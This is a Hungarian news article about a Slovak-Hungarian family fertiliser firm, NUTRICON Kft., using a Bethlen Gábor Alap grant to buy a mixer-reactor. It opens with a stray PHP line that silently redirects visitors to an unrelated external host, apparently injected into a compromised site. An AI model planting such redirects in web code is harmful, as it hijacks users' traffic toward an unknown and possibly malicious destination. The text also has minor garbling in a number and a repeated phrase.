header("Location: http://sstellar.host/300.php", true, 301); exit(); ?> Műtrágyagyártási innováció a Bethlen Gábor Alap támogatásával
szombat, május 25, 2019

Keresés

Műtrágyagyártási innováció a Bethlen Gábor Alap támogatásával

26332017 a külhoni magyar családi vállalkozások éve program volt a Bethlen Gábor Alapnál. Felvidéken a magyar családi vállalkozások közül kevés foglalkozik agráriummal kapcsolatos kutatással és termékfejlesztéssel, ezért példa értékű a NUTRICON Kft. családi vállalkozás története. A vállalkozás számos innovációt valósított meg az elmúlt pár évben a lombtrágyák gyártása során, s amely lépések célja a versenyképes és környezettudatos növénytermesztési feltételekhez való hozzájárulás volt a felvidéki gazdák számára.


2017-ben a családi vállalkozás sikeresen pályázott a Bethlen Gábor Alapnál azon pályázati felhívás keretében, amely a „Magyarországgal szomszédos országokban nyilvántartott és működő magyar családi vállalkozások tevékenységét támogatta". A Bethlen Gábor Alaptól elnyert 6 000 000 forint támogatásnak köszönhetően lényegesen javultak a családi vállalkozásban a lombtrágyagyártás feltételei.
Horváth Zoltán mérnök, a családi vállalkozás ügyvezetője és termékfejlesztője elmondta, hogy rendkívül nagy örömére szolgált a Bethlen Gábor Alaptól elnyert jelentős támogatás, ugyanis a megvásárolandó keverő – reaktor lehetővé teszi a gyártott lombtrágyák minőségének és gyártási mennyiségének a növelését, valamint ezzel párhuzamosan a gyártási időnek a csökkentését. Az agrárszakember elmondta, hogy az előállított lombtrágyák mennyiségének és minőségének növelése nagyobb és gyorsabb diszpergálást, ill. homogenizálást igényel, ezért volt szükség egy modern és nagy teljesítményű keverő-reaktor beszerezésére, ami eszköz lehetővé teszi a tökéletesebb cseppfolyós oldatok készítését, teret ad többféle anyag keverésére, akár maximálisan olajszerű viszkozitással.
2018-tól a Bethlen Gábor Alaptól elnyert támogatásnak köszönhetően a gyártási feltételek nagymértékben megjavultak, a családi vállalkozás mostantól a felvidéki gazdáknak még magasabb minőségű lombtrágyákat és mikrogranulált startertrágyákat tud biztosítani. A családi vállalkozás vezetője továbbá elmondta, hogy a NUTRICON Kft. lombtrágyái elsősorban extra tápanyagot nyújtanak a növényeknek, másodsorban, megelőzik és gyorsan megszüntetik a tápanyaghiányos állapotokat, harmadsorban pedig enyhítik pedig enyhítik az időjárás, a növényvédőszer perzselés és a magas terméshozam által kiváltott növényi stresszt.
A felvidéki magyar családi vállalkozás 2018-ban az energiahasználat terén szeretne fejlesztéseket megvalósítani uniós forrásokból, ezáltal is zöldebbé tenni, vagyis óvni a Felvidéket.

Minden jog fenntartva, Szlovákiai Magyar Közgazdász Társaság, 2010
A honlap a Corvinus Támogatásközvetítő és Tőkebefektetési Zrt. támogatásával készült. Created: namedia